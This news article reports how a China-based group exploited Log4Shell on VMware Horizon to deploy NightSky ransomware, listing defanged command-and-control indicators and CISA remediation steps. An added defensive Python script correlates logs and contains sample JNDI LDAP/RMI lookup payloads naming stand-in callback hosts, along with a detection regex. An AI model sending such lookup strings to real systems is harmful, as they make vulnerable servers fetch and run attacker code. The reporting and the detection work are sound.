Log4Shell bug used to deploy NightSky ransomware on VMware Horizon, says Microsoft

Threat actors continue trying to exploit the vulnerabilities in the open-source Apache log4j2 library collectively known as Log4Shell, according to security researchers, meaning IT teams have to work faster at finding and remediating evidence of the bugs in their software.

The latest warning comes from Microsoft, which said Monday that as early as January 4, attackers from a China-based ransomware operator it calls DEV-0401 started exploiting the CVE-2021-44228 vulnerability in internet-facing systems running VMware Horizon. “Our investigation shows that successful intrusions in these campaigns led to the deployment of the NightSky ransomware,” Microsoft said in its cumulative blog on Log4Shell.

Microsoft’s report follows a January 5th alert by the U.K.’s National Health Service that attackers are actively targeting Log4Shell vulnerabilities in VMware Horizon servers in an effort to establish web shells. The attack likely consists of a reconnaissance phase, where the attacker uses the Java Naming and Directory Interface (JNDI) via Log4Shell payloads to call back to malicious infrastructure, said the alert. The attack exploits the Log4Shell vulnerability in the Apache Tomcat service which is embedded within VMware Horizon, it adds.

“Once a weakness has been identified, the attack then uses the Lightweight Directory Access Protocol (LDAP) to retrieve and execute a malicious Java class file that injects a web shell into the VM Blast Secure Gateway service. The web shell can then be used by an attacker to carry out a number of malicious activities such as deploying additional malicious software.”

VMware has issued remediation advice and patches for a wide range of its products.

Developers and IT administrators should note the latest Adobe patch for log4j2 for those running Java 8 is 2.17.1.

Microsoft said DEV-0401 has previously deployed multiple ransomware families, including LockFile, AtomSilo, and Rook, and has similarly exploited Internet-facing systems running Confluence (CVE-2021-26084) and on-premises Exchange servers (CVE-2021-34473).

Based on Microsoft’s analysis, DEV-0401 is using command and control (CnC) servers that spoof legitimate domains. These include service[.]trendmrcio[.]com, api[.]rogerscorp[.]org, api[.]sophosantivirus[.]ga, apicon[.]nvidialab[.]us, w2zmii7kjb81pfj0ped16kg8szyvmk.burpcollaborator[.]net, and 139[.]180[.]217[.]203.

Also on Monday IBM updated its response to log4j2, including an updated list of products that aren’t affected by the vulnerabilities. However, it also said that list is not final.

Meanwhile, SC Media reports that the U.S. Cybersecurity and Infrastructure Security Agency said Monday that no “significant intrusions” related to the log4j vulnerability have yet been found in the systems of U.S. federal agencies or critical infrastructure sectors.

However, the agency also warned sophisticated adversaries may have already compromised targets and are just waiting to leverage their new access.

The CISA says IT administrators should

• discover all internet-facing assets that allow data inputs and use the Log4j Java library anywhere in the stack;
• discover all assets that use the Log4j library;
• update or isolate affected assets. Assume your environment has been compromised, the agency says. Identify common post-exploit sources and activity, and hunt for signs of malicious activity;
• monitor for odd traffic patterns (e.g., JNDI LDAP/RMI outbound traffic, DMZ systems initiating outbound connections).
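One way to act on the last two items, as an added example that is not from the article, CISA or Microsoft: correlate JNDI lookup strings seen in a web server's request log with that server's own outbound connections, which separates mass scanning (probe only) from a lookup the server actually evaluated (callback observed). The log formats, the server address 10.0.5.20 and every log line are constructed for the example.

```python
import re
from datetime import datetime

# Constructed sample data, not real traffic: access log of a DMZ web server
# (10.0.5.20) and the DMZ firewall's outbound connection log for the same window.
ACCESS_LOG = """\
203.0.113.7 - - [10/Jan/2022:09:15:02 +0000] "GET / HTTP/1.1" 200 512 "Mozilla/5.0"
198.51.100.9 - - [10/Jan/2022:09:15:10 +0000] "GET /portal HTTP/1.1" 200 884 "${jndi:ldap://203.0.113.250:389/a}"
198.51.100.9 - - [10/Jan/2022:09:20:41 +0000] "GET /broker/xml HTTP/1.1" 200 2201 "${jndi:rmi://192.0.2.77:1099/obj}"
"""
CONN_LOG = """\
2022-01-10T09:15:11Z 10.0.5.20 203.0.113.250 389
2022-01-10T09:15:30Z 10.0.5.20 10.0.1.15 443
"""
# A JNDI lookup together with the host:port the vulnerable server would contact.
JNDI_RE = re.compile(r"\$\{\s*jndi:(?P<scheme>[a-z]+)://(?P<host>[^:/\s}]+)(?::(?P<port>\d+))?", re.I)
# Combined-log-style line: client, timestamp, request line, status, size, user agent.
ACCESS_RE = re.compile(r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" \d+ \d+ "(?P<ua>[^"]*)"$')

def parse_probes(log_text):
    """Return each request carrying a JNDI lookup and the callback host:port it names."""
    probes = []
    for line in log_text.splitlines():
        m = ACCESS_RE.match(line)
        j = JNDI_RE.search(m["req"] + " " + m["ua"]) if m else None
        if j:
            ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
            probes.append({"ts": ts, "src": m["src"], "host": j["host"], "port": j["port"]})
    return probes

def parse_conns(conn_text):
    """Firewall lines as (time, src, dst, dport) tuples."""
    rows = []
    for line in conn_text.splitlines():
        ts, src, dst, port = line.split()
        rows.append((datetime.strptime(ts, "%Y-%m-%dT%H:%M:%S%z"), src, dst, port))
    return rows

def correlate(probes, conns, server_ip, window_s=60):
    """Label a probe 'callback' when server_ip connected to the named host within window_s
    seconds of the request, else 'probe-only'. Matches on host, not port, because the
    second-stage fetch may land on a different port than the lookup itself."""
    results = []
    for p in probes:
        hit = any(src == server_ip and dst == p["host"]
                  and 0 <= (ts - p["ts"]).total_seconds() <= window_s
                  for ts, src, dst, _ in conns)
        results.append((p["src"], f'{p["host"]}:{p["port"]}', "callback" if hit else "probe-only"))
    return results
```

A "callback" row is the one to escalate: it means the lookup was evaluated, so the host should be treated as compromised until the hunt says otherwise.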


Howard Solomon
Currently a freelance writer, I'm the former editor of ITWorldCanada.com and Computing Canada. An IT journalist since 1997, I've written for several of ITWC's sister publications including ITBusiness.ca and Computer Dealer News. Before that I was a staff reporter at the Calgary Herald and the Brampton (Ont.) Daily Times. I can be reached at hsolomon [@] soloreporter.com
